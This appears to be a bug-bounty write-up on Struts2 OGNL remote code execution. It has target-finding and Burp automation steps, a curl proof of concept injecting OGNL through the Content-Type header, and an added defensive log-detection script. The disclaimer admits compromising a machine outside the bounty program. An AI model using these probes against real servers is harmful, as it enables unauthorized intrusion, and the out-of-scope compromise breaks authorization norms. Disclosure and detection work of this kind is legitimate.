Write-up

RCE in private program $2500 bounty

Bug Name :- RCE
Bug Priority :- Critical
Bounty :- $2500
      

Description

org.apache.struts:struts2-core is a popular open-source framework for developing web applications in the Java programming language. Affected versions of this package are vulnerable to Remote Code Execution (RCE): forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected package: org.apache.struts:struts2-core, versions [2.0.0, 2.5.22).

Steps to identify

    1) Spider or crawl the application
    2) Check whether the application is built with Java
    3) Check for the file extensions .do, .action, .go and .jsp
    4) Insert OGNL payloads in:
            Content-Type header
            GET or POST parameters
            Endpoints
    5) If the injected response header comes back, the target is vulnerable
    

Steps to Automation

Set the target in Burp, go to the Spider tab, add the OGNL payload and start the spider. If any endpoint is vulnerable, the injected response header shows up automatically. After the spider finishes, open the Search tab, select "in scope", and search for the response header.
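A defender-side counterpart to the identification and automation steps, added here as an example and not part of the original write-up: it gates on the affected struts2-core range quoted in the Description and flags requests that carry OGNL expression openers in headers or query parameters, the way the curl PoC below does. The URLs, header values and the request dict shape are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Affected struts2-core range quoted in the Description above: [2.0.0, 2.5.22)
AFFECTED_LOW = (2, 0, 0)
FIXED_AT = (2, 5, 22)

def parse_version(version: str) -> tuple:
    """Turn a Maven-style version ('2.5.20', '2.3.34.1') into a comparable int tuple."""
    m = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised version: {version!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))

def is_affected_version(version: str) -> bool:
    """True when a struts2-core version falls inside the half-open range [2.0.0, 2.5.22)."""
    return AFFECTED_LOW <= parse_version(version) < FIXED_AT

# Struts-style endpoints named in the hints, and the openers of an OGNL expression.
STRUTS_PATH = re.compile(r"\.(do|action|jsp)$", re.I)
OGNL_OPENER = re.compile(r"[%$]\{")

def is_struts_endpoint(url: str) -> bool:
    return bool(STRUTS_PATH.search(urlsplit(url).path))

def ognl_probe_findings(request: dict) -> list:
    """Where an OGNL opener appears: 'header:<name>' / 'query:<name>' for each hit.
    request is a constructed dict {'method', 'url', 'headers': {name: value}}."""
    findings = []
    for name, value in request.get("headers", {}).items():
        if OGNL_OPENER.search(value):
            findings.append(f"header:{name}")
    query = urlsplit(request["url"]).query          # parse_qsl percent-decodes values
    for name, value in parse_qsl(query, keep_blank_values=True):
        if OGNL_OPENER.search(value):
            findings.append(f"query:{name}")
    return findings

# Constructed sample traffic: a header probe shaped like the curl PoC, an encoded
# query probe, and a benign static-file request.
SAMPLE_REQUESTS = [
    {"method": "GET", "url": "https://target.example/login.action",
     "headers": {"Content-Type": "%{#context['com.opensymphony.xwork2.dispatcher."
                                 "HttpServletResponse'].addHeader('Hacker','x')}.multipart/form-data"}},
    {"method": "GET", "url": "https://target.example/search.do?q=%24%7B1%2B1%7D",
     "headers": {"Content-Type": "application/x-www-form-urlencoded"}},
    {"method": "GET", "url": "https://target.example/static/logo.png", "headers": {}},
]
```

Run the two checks over a WAF or access-log export to triage which Struts endpoints received probes, then confirm exposure with the version gate on the deployed struts2-core.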

Payloads

https://github.com/karthi-the-hacker/PayloadAllTheThings

POC

    curl -i -s -k -X $'GET' \
      -H $'Host: target.com' \
      -H $'User-Agent: Chrome/89.0.4389.114 Safari/537.36' \
      -H $'Connection: close' \
      -H $'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*' \
      -H $'Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1' \
      -H $'Content-Type: %{#context[\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'].addHeader(\'Hacker\', \'karthithehacker\')}.multipart/form-data' \
      -H $'Accept-Encoding: gzip, deflate' \
      $'https://target.com/'

Vulnerable Response

    HTTP/1.1 200 OK
    Server: Apache-Coyote/1.1
    Cache-Control: private
    Expires: XXXXX
    Hacker: karthithehacker
    Set-Cookie: JSESSIONID=XXXXX
    Content-Type: text/html
    Transfer-Encoding: chunked
    Date: XXXXXX
    Connection: close

Impact

Remote code execution (RCE) attacks allow an attacker to remotely execute malicious code on a computer. The impact of an RCE vulnerability can range from malware execution to an attacker gaining full control over a compromised machine.

Hints

Always look for .do, .action and .jsp files.

Disclaimer

In this POC video I have shown how I successfully exploited RCE. I'm not disclosing any of the private program information here. In this video I have compromised a machine which is not in the private program.